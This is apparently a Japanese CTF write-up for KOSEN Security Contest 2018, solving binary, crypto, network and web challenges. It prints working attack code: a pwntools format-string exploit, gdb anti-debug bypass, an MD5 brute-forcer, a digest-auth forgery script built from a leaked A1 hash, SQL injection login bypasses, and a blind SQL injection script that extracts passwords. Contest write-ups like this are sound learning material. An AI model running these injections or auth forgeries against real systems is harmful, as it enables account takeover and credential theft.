KOSEN セキュリティコンテスト 2018( #kosensc ) に参加したおはなし
はじめに
KOSENセキュリティコンテスト2018にJAJAとして参加しました。
今年でkosenscは3回目ですが、今年が一番手応えがあったかなと思います。
結果として、JAJAは2位で終わることができました。
今回は、競技期間中に僕が解けた問題について備忘録程度のWriteupを書きます。
また、Writeupにて、出力や入力が極端に長い場合、...
として省略させていただきます。
目次
- 03 printf (Binary 100)
- 04 XOR,XOR (Binary 200)
- 05 Simple anti debugger (Binary 250)
- 06 exchangeable if (Crypto 100)
- 11 ログインしてフラグを入手せよ。 (Network 150)
- 14 アカウントを奪え (Web 300)
- 15 47405b599e22969295ebed486d7343cb (Web 300)
- おわりに
03 printf (Binary 100)
[問題内容] フラグを読み出せ! ゲームへの接続方法: nc [hostname] [port] 例: nc 27.133.152.42 80
メンバーの一人がほぼ解けていたが、最後に助太刀した問題。
普通にアクセスして、何か打ち込むと以下のようにthe secret
の格納アドレスが得られる。
$ nc 27.133.152.42 80 the secret is in 0xff84a9de what do you want: A there is no A
printf
というタイトルから書式指定文字列攻撃を利用する、ということがわかるらしい。
ということで、下記のような入力を与えると、スタックのデータが覗ける。
$ python -c "print('AAAA'+' %p'*20)" | nc 27.133.152.42 80 the secret is in 0xff930d2e what do you want: there is no AAAA 0x100 0xf7fae5c0 (nil) (nil) (nil) (nil) 0x43530000 0x45534f4b 0x73757b4e 0x72705f65 0x66746e69 0x726f635f 0x74636572 0x7d796c 0x41414141 0x20702520 0x25207025 0x70252070 0x20702520 0x25207025
4バイト×15個先に入力したAAAA(0x41414141)
があるので、そこにthe secret
の格納アドレスをうまく入れて、そこをさらに参照できれば、フラグが得られる。
メンバーからpayload(格納アドレス%15$s
)をもらったので、そのままpwntoolsで投げる。
from pwn import * conn = remote("27.133.152.42", 80) str = conn.recvline() pay = p32(int(str[-11:-1], 16))+"%15$s" conn.sendline(pay) print(conn.recvline())
# python printf.py [+] Opening connection to 27.133.152.42 on port 80: Done what do you want: there is no \x0e<\x8a\xffSCKOSEN{use_printf_correctly} [*] Closed connection to 27.133.152.42 port 80
Flag: SCKOSEN{use_printf_correctly}
04 XOR,XOR (Binary 200)
[問題内容] アセンブリを読んでフラグを入手しろ!
asmreading
という実行ファイルが与えられる。
普通に実行しても何も起きないので、解析する。
$ file asmreading asmreading: ELF 32-bit LSB pie executable Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=255dacefca5f60eeb7fca2ac73852c27c1e8070f, not stripped $ ./asmreading
アセンブリをまじまじと読みたくはないので、とりあえずradare2
。
$ r2 -d asmreading [0xf77b9250]> aaa [0xf77b9250]> afl ... 0x565b0549 1 4 sym.__x86.get_pc_thunk.dx 0x565b054d 4 83 sym.xor_func 0x565b05a0 3 336 sym.main 0x565b06f0 1 4 sym.__x86.get_pc_thunk.ax ... [0xf77b9250]> s sym.main [0x565b05a0]> VV [0x565b05a0]> VV @ sym.main (nodes 3 edges 2 zoom 100%) BB-SUMM mouse:canvas-y movements-speed:5 .-------------------------------------------. | [0x565b05a0] ;[gd] | | 0x565b05b1 call sym.__x86.get_pc_thunk.ax | | 0x565b06ca call sym.xor_func | `-------------------------------------------' | | | '-------------------------. .-------------------' | | | | | --------------------------------------------. .--------------------. | 0x565b06e3 ;[gf] | | 0x565b06e8 ;[gc] | | 0x565b06e3 call sym.__stack_chk_fail_local | `--------------------' `--------------------------------------------'
上記の図だとかなり省略しているが、call命令の間にたくさんmov命令でxor_func
の引数らしきものを用意しているので、きっとxor_func
でそれをxorするとフラグがでてくるのだろうと、予測がつく。
ただし、やはりアセンブリを読むのはめんどくさいので、そのままデバッガでブレークポイントを仕掛けて、xor_func
の返り値を見てみる。
(ここではradare2の動的解析には慣れてないのでgdbをつかう)
はじめに、xor_func
の返り値を見るために、xor_func
にブレークポイントを仕掛けて、xor_func
を実行する。
$ gdb -q asmreading Reading symbols from asmreading...(no debugging symbols found)...done. (gdb) b xor_func Breakpoint 1 at 0x551 (gdb) run Starting program: /root/workspace/ctf/kosensc2018/Binary_200/asmreading Breakpoint 1, 0x56555551 in xor_func () (gdb) n Single stepping until exit from function xor_func, which has no line number information. 0x565556cf in main () (gdb) layout asm ┌──────────────────────────────────────────────────────┐ │0x565556ba <main+282> movb $0x14,-0xd(%ebp) │ │0x565556be <main+286> lea -0x69(%ebp),%eax │ │0x565556c1 <main+289> push %eax │ │0x565556c2 <main+290> lea -0x2b(%ebp),%eax │ │0x565556c5 <main+293> push %eax │ │0x565556c6 <main+294> lea -0x4a(%ebp),%eax │ │0x565556c9 <main+297> push %eax │ │0x565556ca <main+298> call 0x5655554d <xor_func> │ >│0x565556cf <main+303> add $0xc,%esp │ │0x565556d2 <main+306> mov $0x0,%eax │ └──────────────────────────────────────────────────────┘ native process 2192 In: main L?? PC: 0x565556cf
ここで、xor_func
にスタックで渡している引数3つ(第1引数:-0x4a(%ebp)
,第2引数:-0x2b
,第3引数:-0x69
)でどんな値を渡しているか見てみる。
(gdb) x/s $ebp-0x4a 0xffffd57e: "y8NArwYj>XJgIme3RQhh_M<vo1Z]jXi*{\005\016!2\027\021G7?8*\f\vl 4\t\f" (gdb) x/s$ebp-0x2b 0xffffd59d: "*{\005\016!2\027\021G7?8*\f\vl 4\t\f" (gdb) x/s $ebp-0x69 0xffffd55f: "SCKOSEN{you_can_read_assembly!}y8NArwYj>XJgIme3RQhh_M<vo1Z]jXi*{\005\016!2\027\021G7?8*\f\vl 4\t\f"
すると、あらふしぎ。フラグがでてきてしまった。 ちなみに、これらの引数は、第1引数と第2引数には、xorを取るための文字列のポインタが格納されていて、第3引数にxorを取ったあとの文字列のポインタが格納されていると考えられる。
(gdb) x/31b $ebp-0x4a 0xffffd57e: 0x79 0x38 0x4e 0x41 0x72 0x77 0x59 0x6a 0xffffd586: 0x3e 0x58 0x4a 0x67 0x49 0x6d 0x65 0x33 0xffffd58e: 0x52 0x51 0x68 0x68 0x5f 0x4d 0x3c 0x76 0xffffd596: 0x6f 0x31 0x5a 0x5d 0x6a 0x58 0x69 (gdb) x/31b $ebp-0x2b 0xffffd59d: 0x2a 0x7b 0x05 0x0e 0x21 0x32 0x17 0x11 0xffffd5a5: 0x47 0x37 0x3f 0x38 0x2a 0x0c 0x0b 0x6c 0xffffd5ad: 0x20 0x34 0x09 0x0c 0x00 0x2c 0x4f 0x05 0xffffd5b5: 0x0a 0x5c 0x38 0x31 0x13 0x79 0x14
ということで、下記のスクリプトでこれらの値同士でxorを取ると、同様にフラグが得られる。
$ cat solve.py first = [0x79, 0x38, 0x4e, 0x41, 0x72, 0x77, 0x59, 0x6a,0x3e, 0x58, 0x4a, 0x67, 0x49, 0x6d, 0x65, 0x33,0x52, 0x51, 0x68, 0x68, 0x5f, 0x4d, 0x3c, 0x76,0x6f, 0x31, 0x5a, 0x5d, 0x6a, 0x58, 0x69] second = [0x2a, 0x7b, 0x05, 0x0e, 0x21, 0x32, 0x17, 0x11,0x47, 0x37, 0x3f, 0x38, 0x2a, 0x0c, 0x0b, 0x6c,0x20, 0x34, 0x09, 0x0c, 0x00, 0x2c, 0x4f, 0x05,0x0a, 0x5c, 0x38, 0x31, 0x13, 0x79, 0x14] print("".join([chr(f^s) for f,s in zip(first, second)])) $ python solve.py SCKOSEN{you_can_read_assembly!}
Flag:SCKOSEN{you_can_read_assembly!}
05 Simple anti debugger (Binary 250)
[問題内容] gdbにアタッチしてみたが動かない。 どうやって解析しようか。
simple_anti_debugger
というファイルが与えられる。
$ file simple_anti_debugger simple_anti_debugger: ELF 32-bit LSB pie executable Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=4f93e375d47f12cba399fa47c23bd59dc32bcde7, not stripped $ ./simple_anti_debugger You don't seem to be using debugger :) input your password: A wrong password :(
どうやらアンチデバッグの機能があり、有効なパスワードを入れるとフラグが得られるようだ。
とりあえずXOR,XOR
と同様に、アセンブリはあまり読みたくないので、まずはradare2
で解析。
$ r2 -d simple_anti_debugger [0xf778b250]> aaa [0xf778b250]> afl ... 0x56571689 1 4 sym.__x86.get_pc_thunk.dx 0x5657168d 4 82 sym.decode 0x565716df 7 103 sym.is_correct_password 0x56571746 3 73 sym.detect_debugger 0x5657178f 6 242 main 0x56571890 4 93 sym.__libc_csu_init ... [0xf778b250]> s main [0x5657178f]> VV [0x5657178f]> VV @ main (nodes 6 edges 6 zoom 100%) BB-SUMM mouse:canvas-y movements-speed:5 .-------------------------------------------. | [0x5657178f] ;[gg] | | 0x565717a1 call sym.__x86.get_pc_thunk.bx | | 0x565717c9 call sym.imp.puts | | 0x565717db call sym.imp.printf | | 0x565717f5 call sym.imp.fgets | | 0x56571804 call sym.is_correct_password | `-------------------------------------------' | | | '--------------------. .------------' | | | | | .---------------------------------. .------------------------------. | 0x56571810 ;[gj] | | 0x5657184f ;[gf] | | 0x5657181a call sym.decode | | 0x56571859 call sym.imp.puts | | 0x5657182c call sym.imp.puts | `------------------------------' | 0x56571845 call sym.imp.printf | | `---------------------------------' | | | '-----------------------. | .-------------' | | .--------------------. | 0x56571861 ;[gi] | `--------------------' | | | '--------------. .------------------------------' | | | | | .--------------------------------------------. .--------------------. | 0x56571872 ;[gm] | | 0x56571877 ;[gk] | | 0x56571872 call sym.__stack_chk_fail_local | `--------------------' `--------------------------------------------'
関数一覧を見ると、いくつかの主要な関数が見つかり、おそらくエンコードされているフラグをデコードするdecode
、アンチデバッグの機能を持つであろうdetect_debugger
なども見つかった。
しかしmain
ではdetect_debugger
は呼ばれていなかった。
main
の処理を見てみると、0x565717f5
で文字列を受け取り、is_correct_password
を呼び出し、その結果次第で、処理が変わっているようにみえる。
以上のことを踏まえて、detect_debugger
とis_correct_password
にブレークポイントを仕掛けてgdbでデバッグしてみる。
$ gdb -q ./simple_anti_debugger Reading symbols from ./simple_anti_debugger...(no debugging symbols found)...done. (gdb) b is_correct_password Breakpoint 1 at 0x6e3 (gdb) b detect_debugger Breakpoint 2 at 0x5655574a (gdb) run Starting program: /root/workspace/ctf/kosensc2018/Binary_250/simple_anti_debugger Breakpoint 2, 0x5655574a in detect_debugger () (gdb) layout asm ┌──────────────────────────────────────────────────────────────────────────┐ B+>│0x5655574a <detect_debugger+4> sub $0x4,%esp │ │0x5655574d <detect_debugger+7> call 0x56555590 <__x86.get_pc_thunk.bx> │ │0x56555752 <detect_debugger+12> add $0x186a,%ebx │ │0x56555758 <detect_debugger+18> push $0x0 │ │0x5655575a <detect_debugger+20> push $0x1 │ │0x5655575c <detect_debugger+22> push $0x0 │ │0x5655575e <detect_debugger+24> push $0x0 │ │0x56555760 <detect_debugger+26> call 0x56555530 <ptrace@plt> │ │0x56555765 <detect_debugger+31> add $0x10,%esp │ │0x56555768 <detect_debugger+34> cmp $0xffffffff,%eax │ │0x5655576b <detect_debugger+37> jne 0x56555789 <detect_debugger+67> │ │0x5655576d <detect_debugger+39> sub $0xc,%esp │ │0x56555770 <detect_debugger+42> lea -0x168c(%ebx),%eax │ │0x56555776 <detect_debugger+48> push %eax │ │0x56555777 <detect_debugger+49> call 0x565554f0 <puts@plt> │ │0x5655577c <detect_debugger+54> add $0x10,%esp │ │0x5655577f <detect_debugger+57> sub $0xc,%esp │ │0x56555782 <detect_debugger+60> push $0x1 │ │0x56555784 <detect_debugger+62> call 0x56555500 <exit@plt> │ │0x56555789 <detect_debugger+67> nop │ │0x5655578a <detect_debugger+68> mov -0x4(%ebp),%ebx │ │0x5655578d <detect_debugger+71> leave │ │0x5655578e <detect_debugger+72> ret │ └──────────────────────────────────────────────────────────────────────────┘ native process 2340 In: detect_debugger L?? PC: 0x5655574a
どうやら0x56555768
で%eax
が$0xffffffff
(-1)と一致してしまうと、exit
してしまうことがわかった。
(gdb) b *0x56555768 Breakpoint 3 at 0x56555768 (gdb) c Continuing. Breakpoint 3, 0x56555768 in detect_debugger () (gdb) p/x $eax $1 = 0xffffffff (gdb) set $eax = 0 (gdb) p/x $eax $2 = 0x0 (gdb) c Continuing. You don't seem to be using debugger :) input your password: A Breakpoint 1, 0x565556e3 in is_correct_password ()
そこで、0x56555768
にブレークポイントを仕掛けて、処理を進める。
そして、ブレークポイント地点で、%eax
レジスタの値を変えて、アンチデバッグを回避し、さらに処理を進める。
アンチデバッグを回避でき、処理を進めると、passwordの入力画面になる。
適当な値を入力すると、次はis_correct_password
のブレークポイントで処理が停止する。
│0x5655572c <is_correct_password+77> cmpl $0xa5,-0x10(%ebp) │ │0x56555733 <is_correct_password+84> jne 0x5655573c <is_correct_password+93> │ │0x56555735 <is_correct_password+86> mov $0x1,%eax │ │0x5655573a <is_correct_password+91> jmp 0x56555741 <is_correct_password+98> │ │0x5655573c <is_correct_password+93> mov $0x0,%eax │ │0x56555741 <is_correct_password+98> mov -0x4(%ebp),%ebx │ │0x56555744 <is_correct_password+101> leave │ │0x56555745 <is_correct_password+102> ret │
ここで、is_correct_password
の分岐処理をよく見てみると、どうやら-0x10(%ebp)
の値が$0xa5
でなければ、%eax
には0
が、$0xa5
であれば$eax
には1
という値が入るということがわかった。
│0x56555804 <main+117> call 0x565556df <is_correct_password> │ │0x56555809 <main+122> add $0x10,%esp │ │0x5655580c <main+125> test %eax,%eax │ │0x5655580e <main+127> je 0x5655584f <main+192> │ │0x56555810 <main+129> sub $0xc,%esp │ │0x56555813 <main+132> lea 0x4c(%ebx),%eax │ │0x56555819 <main+138> push %eax │ │0x5655581a <main+139> call 0x5655568d <decode> │
main
の処理も見てみると、フラグをデコードしてくれるdecode
を飛ばさないためには、%eax
は1
である必要があるということがわかった。
(gdb) b *0x5655580c Breakpoint 4 at 0x5655580c (gdb) c Continuing. Breakpoint 4, 0x5655580c in main () (gdb) set $eax = 1 (gdb) c Continuing. correct password! flag is SCKOSEN{I_like_debugger} [Inferior 1 (process 2340) exited normally]
最後に、0x5655572c
にブレークポイントをしかけて、そこまで処理を進め、%eax
に1
を代入、そして処理を最後まで進めることで、フラグが得られた。
Flag: SCKOSEN{I_like_debugger}
06 exchangeable if (Crypto 100)
[問題内容] 画像を見つけた。フラグを取り出せ!
out.jpeg
という画像が与えられる。
ひとまず、調査。
$ file out.jpg out.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5, description=md5=2009d1c114ed83f57cf8adde69fd6ca8, xresolution=112, yresolution=120, resolutionunit=1], baseline, precision 8, 500x500, frames 3 $ exiftool out.jpg ExifTool Version Number : 10.32 File Name : out.jpg Directory : . File Size : 10 kB File Modification Date/Time : 2018:09:02 18:54:57+09:00 File Access Date/Time : 2018:09:02 18:57:27+09:00 File Inode Change Date/Time : 2018:09:02 18:54:57+09:00 File Permissions : rw-r--r-- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1.01 Exif Byte Order : Big-endian (Motorola, MM) Image Description : md5=2009d1c114ed83f57cf8adde69fd6ca8 X Resolution : 1 Y Resolution : 1 Resolution Unit : None Y Cb Cr Positioning : Centered Image Width : 500 Image Height : 500 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2) Image Size : 500x500 Megapixels : 0.250
exiftool
のImage Description
に怪しいmd5=2009d1c114ed83f57cf8adde69fd6ca8
があることがわかる。
はじめは、このout.jpeg
のファイルサイズを削ったら同じmd5ハッシュになるのかなぁ、などと考えていたが、チームメンバーが「フラグのハッシュなんじゃない?」と閃いてくれたので、あとはスクリプトを書くだけ。
import hashlib, sys from itertools import product from string import digits, ascii_uppercase, ascii_lowercase if __name__ == '__main__': md5 = "2009d1c114ed83f57cf8adde69fd6ca8" x = "" before = "SCKOSEN{sHDtF1" after = "NLTIWp}" chars = digits + ascii_uppercase + ascii_lowercase i = 0 for comb in product(chars, repeat=4): flag = before + "".join(comb) + after if md5 == hashlib.md5(flag.encode('utf-8')).hexdigest(): print("\nOK:", flag) break else: sys.stdout.write("\r"+flag+"\t"+str(i)) i += 1
$ time python bf.py SCKOSEN{sHDtF1qOLYNLTIWp} 12486648 OK: SCKOSEN{sHDtF1qOLZNLTIWp} real 2m51.198s user 1m56.965s sys 0m20.551s
(数字10種類+大小英数字52種類)^4
だと計算終わらないんじゃ無いかと思っていたが、意外といけた。
Flag: SCKOSEN{sHDtF1qOLZNLTIWp
11 ログインしてフラグを入手せよ。 (Network 150)
[問題内容] ヒント: 我々は秋葉原ラジオ会館上空に飛来したタイムマシンを用いて、未来の超高性能コンピュータを入手した。 そのコンピュータによると、MD5の値
2b21424f30227ac8bc08c69216c30815
のハッシュ化前の値は以下であるらしい。c932836c1feff27841c03453e81d5b13:oX3Ar2V0BQA=34c6176e8e33d6da83cc500028b8f9c8de95b91d:00000001:OWEyZWEyNmZhNzAyYTUwMzM0MzRjYzMxZDljZGY2OTU=:auth:71998c64aea37ae77020c49c00f73fa8
digest.pcap
というファイルが与えられる。
digest.pcap
を開いて、http
でフィルターすると、以下のようになる。
問題とファイル名からして、ヒントとpcapファイルを使って、なりすましdigest認証をすればフラグが得られると予想できる。
digest認証では、最初のアクセス時にサーバーから401 Unauthorized
レスポンスと一緒にrealm
やnonce
、algorithm
、qop
などの値が与えられる(このうちnonce
のみ認証ごとに変化する)。
そして、クライアントはその情報に、username
やuri
、cnonce
、nc
、response
(、Method
)といった値を追加して、認証を行う。
この際、cnonce
とnc
はブラウザから与えられ、uri
はアクセス先のuriである。
つまり、認証を行う際に必要なパラメータはusername
とresponse
である。
username
は、WireSharkのHTTPリクエストを見てみると、はtanaka
であるということがわかる。
また、response
という値は次のように計算される。
A1 = md5(username+':'+realm+':'+password) A2 = md5(Method+':'+uri) response = md5(A1+':'+nonce+':'+nc+':'+cnonce+':'+qop+':'+A2)
ここで、ヒントを見返してみると、2b21424f30227ac8bc08c69216c30815
という値はresponse
値であるということが予測できる。
さらにそのmd5ハッシュ化前の値から、A1の値がc932836c1feff27841c03453e81d5b13
であるということがわかる。
A1という値は認証ごとに変わる値ではなく、また、username
とpassword
の情報が入っている。
つまり、このA1の値を使えばdigest認証をなりすましで通過できる。
あとは、このA1の値を使ってresponse
を計算するスクリプトを使って、なりすませばフラグが得られる。
# -*- coding: utf-8 -*- import hashlib, sys def md5(s): return hashlib.md5(s.encode('utf-8')).hexdigest() if __name__ == '__main__': argv = sys.argv nonce = argv[1] # nonce cnonce = argv[2] # cnonce username = "tanaka" realm = "Digest Auth" Method = "GET" uri = "/flag.txt" A2 = md5(Method+":"+uri) nc = "00000001" qop = "auth" A1 = "c932836c1feff27841c03453e81d5b13" res = md5(A1+":"+nonce+":"+nc+":"+cnonce+":"+qop+":"+A2) print("response=\""+res+"\"")
$ python auth.py Gh+DNeJ0BQA=cfa1b451b276606f5d76d67078c7b67175ebcbe2 4472a6b551127b86dc86c741971d5c26 response="c21a4ec23b01467b2cb0ad188dab4583"
Flag: SCKOSEN{digest_auth_is_secure!}
14 アカウントを奪え (Web 300)
[問題内容] アカウントを奪ってしまおう。 フラグはSCKOSEN{keyword}の形で、keywordを探してほしい。
URLにアクセスすると、フォームがあり"kosenjoh"ユーザーでログインしてください
とある。
いつものSQL(' or 1=1 --
)を投げてあげると、ログインに成功し、次のようなソースコードが出力される。
フラグは、'kosenjoh' ユーザーのパスワードです。 Hello, Hacker!!! 古戦場から逃げるな!! <?php function h($ret) { return htmlspecialchars($ret, ENT_QUOTES, 'UTF-8'); } if ($_SERVER['REQUEST_METHOD'] == "POST") { $userid = $_POST['userid']; $pass = $_POST['pass']; $check = false; if (strlen($userid) !== 0 and strlen($pass) !== 0) { $err = ''; if ($userid !== '') { try { $dbh = new PDO('sqlite:../database/user.db'); $result = $dbh->query("SELECT count(*) as count FROM user WHERE userid='$userid' AND pass='$pass'"); if ($result !== false) { $result = $result->fetch(PDO::FETCH_ASSOC); if ($result["count"] > 0) { $check = true; } } } catch (Exception $e) { //echo $e->getMessage(); } if (!$check) { $err = 'ログインに失敗しました.....XD'; } } } else { $err = "UseridとPasswordを入力してください。"; } } else { $userid = ""; $pass = ""; $err = ""; $check = false; } ?>
ただし、フラグは問題文にある通り、kosenjoh
ユーザーのパスワードなので、それを抜き出さなければいけない。
ここで、このWebサーバーのホスト名にもある通り、bsql(Blind SQL Injection)をして、情報を抜き出す。
今は、' or 1=1 --
の1=1
の部分が今は必ずTrue
になってログインに成功する。
そこで、その部分をある条件のもとでTrue
になる、というふうに書き換えれば、bsqliで情報を抜き出すことができる。
具体的には、ソースコードからテーブル名、カラム名がわかっているので、' or length((select pass from user where id='kosenjoh')) < 30 --
といったクエリを投げる。
ここで、(select pass from user where id='kosenjoh')
、つまりkosenjoh
のパスワードの長さが30文字未満であれば、この条件はTrue
となり、ログインに成功する。
そうでなければ、ログインに失敗する。
これを使ってまず、kosenjoh
のパスワードの長さは24文字だということがわかった。
つぎに、' or hex(substr((select pass from user where userid='kosenjoh'), 1, 1)) < hex('a') --
のようなクエリを投げる。
ここで、substr(pass, 1, 1)
でpass
の1文字目から1文字だけ取り出し、それをhex()
でアスキーコードに変換し、数値で比較する。
これを使うことで、1文字ずつフラグを割り出すことができた。
ちなみに、競技中は完全に手動で1文字ずつ割り出しており、かなり時間もかかった。 (その分、手動バイナリサーチの達人となった。) そこで、勉強もかねて、バイナリサーチを使ったBlind SQL Injectionのスクリプトを作成した。
import requests from string import digits, ascii_uppercase, ascii_lowercase url = "http://bsql.kosensc2018.tech" s = requests.session() chars = digits + ascii_uppercase + ascii_lowercase def asm_params(i, f, c): sql = "' or hex(substr((select pass from user where userid='kosenjoh'), {}, 1)) {} hex('{}') --".format(i, f, c) params = {"userid": "kosenjoh", "pass": sql} return params def bin_search(i, imin, imax): imid = int(round(imin + (imax - imin) / 2)) if "Hacker" in s.post(url, data=asm_params(i, ">", chars[imid])).text: return bin_search(i, imid+1, imax) elif "Hacker" in s.post(url, data=asm_params(i, "<", chars[imid])).text: return bin_search(i, imin, imid-1) else: return imid if __name__ == "__main__": flag = "" for i in range(1,25): flag += chars[bin_search(i, 0, 62)] print(flag)
$ python bsql.py s sk sku skur skura skuraf skurafj skurafji skurafjit skurafjitm skurafjitmi skurafjitmiy skurafjitmiym skurafjitmiymt skurafjitmiymto skurafjitmiymtok skurafjitmiymtoki skurafjitmiymtokit skurafjitmiymtokitm skurafjitmiymtokitmr skurafjitmiymtokitmrp skurafjitmiymtokitmrpe skurafjitmiymtokitmrpec skurafjitmiymtokitmrpeco
Flag: SCKOSEN{skurafjitmiymtokitmrpeco}
15 47405b599e22969295ebed486d7343cb (Web 300)
[問題内容] Find the flag!
URLにアクセスすると、Find the flag.
とあり、フォームが2つある。
上のフォームにいつものSQL(' or 1=1 --
)を入れるとSearch Result:
と出て、テーブル全体が抜き出せる。
このテーブルは83行あり、Value
をアスキー変換すると下記のような文章が出てきた。
$ python s = [83,111,114,114,121,46,46,46,32,58,60,10,84,104,105,115,32,118,97,108,117,101,115,32,97,114,101,110,39,116,32,102,108,97,103,46,46,46,10,10,72,105,110,116,58,10,84,104,105,115,32,102,108,97,103,32,105,115,32,116,104,101,32,115,111,109,101,111,110,101,39,115,32,112,97,115,115,119,111,114,100,46,10] print("".join([chr(c) for c in s])) Sorry... :< This values aren't flag... Hint: This flag is the someone's password.
上のフォームはダミーであることがわかったので、つぎに下のフォームにいつものSQL(' or 1=1 --
)を入れたところError: Multiple Result is NOT allowed!
というエラーを吐かれた。
リザルトが複数あるのはダメだよ〜ということなのでLIMIT句をつかって、' or 1=1 limit 1 --
としたところWelcome!
と出力された。
ということで、ここでも前問と同じBlind SQL Injectionを使ってフラグを抜き出す。
前問と違うのは、ユーザー名がわからないことである。
そこで、' or (select count(*) from user) > 10 limit 1--
というクエリを投げることで、まずユーザー数を探る。
しかし、SQLITE_ERROR: no such table: user
というエラーが出力された。
テーブル名についてもbsqliしても良かったが、チームメンバーがusers
というテーブルを見つけてくれた。
そして、' or (select count(*) from users) = 6 limit 1--
というクエリでWelcome!
が表示されたので、ユーザー数は6人であることがわかった。
つぎに、1番上のユーザー名を探る。
しかし、' or length((select userid from users limit 1)) > 30 limit 1--
というクエリを投げたところまたSQLITE_ERROR: no such column: userid
というエラーが出力された。
カラム名についてもbsqliしても良かったが、これも運よくフォームのname属性と同じ、id
というカラムがユーザー名に該当するということがわかった。
そして、' or length((select id from users limit 1)) = 5 limit 1--
というクエリでWelcome!
が表示されたので、1番目のユーザー名の文字数は5文字であることがわかった。
5文字ということがわかったので、' or hex(substr((select id from users limit 1), 1, 1)) > hex("a") limit 1--
といったクエリで探った結果、1番目のユーザー名はAdmin
であることがわかった。
それっぽいユーザー名なのでひとまず、Admin
というユーザーのパスワードを前問と同じ要領で探ると、フラグが出てきた。
ちなみに、この問題でも前問と同じスクリプトで試してみた。
$ time python bsql.py S SC SCK SCKO SCKOS SCKOSE SCKOSEN SCKOSEN{ SCKOSEN{W SCKOSEN{W2 SCKOSEN{W22 SCKOSEN{W22X SCKOSEN{W22Xx SCKOSEN{W22Xxn SCKOSEN{W22Xxnq SCKOSEN{W22Xxnq9 SCKOSEN{W22Xxnq9g SCKOSEN{W22Xxnq9g8 SCKOSEN{W22Xxnq9g8r SCKOSEN{W22Xxnq9g8rf SCKOSEN{W22Xxnq9g8rfn SCKOSEN{W22Xxnq9g8rfnE SCKOSEN{W22Xxnq9g8rfnEH SCKOSEN{W22Xxnq9g8rfnEHG SCKOSEN{W22Xxnq9g8rfnEHGy SCKOSEN{W22Xxnq9g8rfnEHGyD SCKOSEN{W22Xxnq9g8rfnEHGyDJ SCKOSEN{W22Xxnq9g8rfnEHGyDJ7 SCKOSEN{W22Xxnq9g8rfnEHGyDJ7A SCKOSEN{W22Xxnq9g8rfnEHGyDJ7AJ SCKOSEN{W22Xxnq9g8rfnEHGyDJ7AJ8 SCKOSEN{W22Xxnq9g8rfnEHGyDJ7AJ8t SCKOSEN{W22Xxnq9g8rfnEHGyDJ7AJ8tF SCKOSEN{W22Xxnq9g8rfnEHGyDJ7AJ8tFg SCKOSEN{W22Xxnq9g8rfnEHGyDJ7AJ8tFg} 172 real 0m3.777s user 0m1.397s sys 0m0.361s
4秒未満で、試行回数172回で35文字の文字列の抽出に成功できた。
Flag: SCKOSEN{W22Xxnq9g8rfnEHGyDJ7AJ8tFg}
おわりに
今回は、いつもより多く問が解けたので、とても楽しかったし、とても勉強になりました。 競技時間はもう少し長めでもいいかなあとは思います。 競技終了後も問題サーバーにしばらくアクセスできるのはとてもいいと思います。 あと手動二分探索力が圧倒的につきました。 全完したかった。。!
運営、その他関係者の皆様、楽しく、とても勉強になる大会をありがとうございました。